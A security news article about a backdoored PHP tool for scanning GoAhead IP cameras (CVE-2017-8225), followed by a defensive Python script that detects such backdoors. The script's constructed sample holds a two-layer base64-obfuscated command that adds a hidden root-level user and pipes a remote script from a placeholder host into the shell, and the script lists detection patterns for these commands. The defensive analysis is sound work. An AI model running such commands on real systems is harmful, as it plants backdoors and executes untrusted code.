Security researchers have discovered a new hacking tool, dubbed NEW IPCAM EXPLOIT, that contains a backdoor and is offered on several underground hacking forums.
Wannabe hackers, be careful with free hacking tools: many of them are scams. Security experts recently reported several cases of fake hacking tools hiding backdoors, for example a fake Facebook hacking tool and the Cobian RAT.
Now, security researcher Ankit Anubhav has discovered a new tool containing a backdoor that is offered on several underground hacking forums. The hacking tool is a free PHP script that lets users scan the Internet for IP cameras running a vulnerable version of the GoAhead embedded web server.
“The market is particularly hot for IoT devices using a vulnerable version of an embedded GoAhead server. This arises due to the fact that there are a large number of IP camera vendors that can be hacked using exploits like CVE-2017-8225, and it is already employed successfully by the IoTroop/Reaper botnet.” wrote the researcher in a blog post.
“On 22nd October 2017, we observed a shady yet popular site that often hosts IoT botnet scripts had a new piece of code to offer. Labeled as “NEW IPCAM EXPLOIT”, this script promised to make the work of script kiddies easy by helping them locate IoT devices that use the potentially vulnerable embedded GoAhead server.”
The expert analyzed NEW IPCAM EXPLOIT and discovered that it includes code to hack the wannabe criminals who use it; this means that if the script kiddie owns a botnet, the scammers behind the tool can use it to take that botnet over.
After going through all the layers of decoding, the expert found that NEW IPCAM EXPLOIT scans the web for devices using the GoAhead embedded server by checking for the banner “GoAhead-Webs”. At the bottom of the script there is a backdoor that uses a shell script to contact a malicious server, download a second-stage script, and execute it.
The NEW IPCAM EXPLOIT IoT scanning script works in four steps:
- The script scans a set of IP addresses looking for GoAhead servers vulnerable to the authentication bypass flaw tracked as CVE-2017-8225. The vulnerability affects Wireless IP Camera (P2P) WIFI CAM devices.
- The script establishes a secret backdoor by creating a user account (username: VM | password: Meme123) on the wannabe cybercriminal’s system. The scammer gains the same root privileges as the victim.
- The script determines the IP address of the wannabe hacker in order to access the compromised system remotely.
- The script runs a second payload on the victim’s system; in some cases it installs the Kaiten bot.
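As an added defender-side example (not the script analysed in the article), the following Python triage checks an untrusted PHP tool for the pattern the four steps above describe: it peels nested base64_decode layers, flags user-creation and second-stage download commands, and checks a passwd dump for the hard-coded account. The sample PHP script, the stage-two host name and the passwd lines are constructed for this example.

```python
import base64
import re

# Indicators taken from the article: the hard-coded account and the shell
# commands a backdoor needs to add a user or fetch and run a second stage.
BACKDOOR_USERNAME = "VM"
SUSPICIOUS = {
    "creates_user": re.compile(r"\b(useradd|adduser)\b"),
    "sets_password": re.compile(r"\b(chpasswd|passwd)\b"),
    "fetches_stage2": re.compile(r"\b(wget|curl)\b"),
    "shells_out": re.compile(r"\b(shell_exec|exec|system|passthru)\s*\("),
}
B64_LITERAL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")

def peel_base64_layers(php_src, max_layers=8):
    """Repeatedly replace base64_decode('...') literals with their plaintext; returns (plaintext, layers)."""
    text, layers = php_src, 0
    while layers < max_layers:
        m = B64_LITERAL.search(text)
        if not m:
            break
        try:
            inner = base64.b64decode(m.group(1), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            break  # not a real base64 layer; stop rather than guess
        text = text[:m.start()] + inner + text[m.end():]
        layers += 1
    return text, layers

def triage_php_tool(php_src):
    """Flag the backdoor behaviours listed above in a PHP script; returns a dict of findings."""
    plain, layers = peel_base64_layers(php_src)
    found = {name: bool(rx.search(plain)) for name, rx in SUSPICIOUS.items()}
    found["obfuscation_layers"] = layers
    found["hardcoded_account"] = bool(re.search(r"useradd\b.*\b" + BACKDOOR_USERNAME + r"\b", plain))
    found["verdict"] = "BACKDOORED" if found["creates_user"] or found["fetches_stage2"] else "clean-looking"
    return found

def backdoor_account_present(passwd_text):
    """Host check: is the backdoor account present in an /etc/passwd dump (as text)?"""
    return any(line.split(":")[0] == BACKDOOR_USERNAME for line in passwd_text.splitlines())

# Constructed sample: a benign-looking banner scanner carrying a two-layer payload.
# The stage-two host name is a placeholder, not an indicator from the article.
_stage = "useradd -m VM; echo 'VM:Meme123' | chpasswd; wget -qO- http://stage2.example.invalid/s.sh | sh"
_layer1 = base64.b64encode(('shell_exec("%s");' % _stage).encode()).decode()
_layer2 = base64.b64encode(("eval(base64_decode('%s'));" % _layer1).encode()).decode()
SAMPLE_BACKDOORED = "<?php\n$banner = 'GoAhead-Webs';\neval(base64_decode('%s'));\n" % _layer2
SAMPLE_CLEAN = "<?php\n$banner = 'GoAhead-Webs';\necho strpos($hdr, $banner) !== false;\n"
SAMPLE_PASSWD = "root:x:0:0:root:/root:/bin/bash\nVM:x:1001:1001::/home/VM:/bin/sh\n"
```

Running `triage_php_tool(SAMPLE_BACKDOORED)` reports two peeled layers, the user-creation and download commands, and the hard-coded account; the clean sample reports none of them.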
Experts from BleepingComputer, who investigated further, reported that the author of the script had already put other backdoored hacking tools online.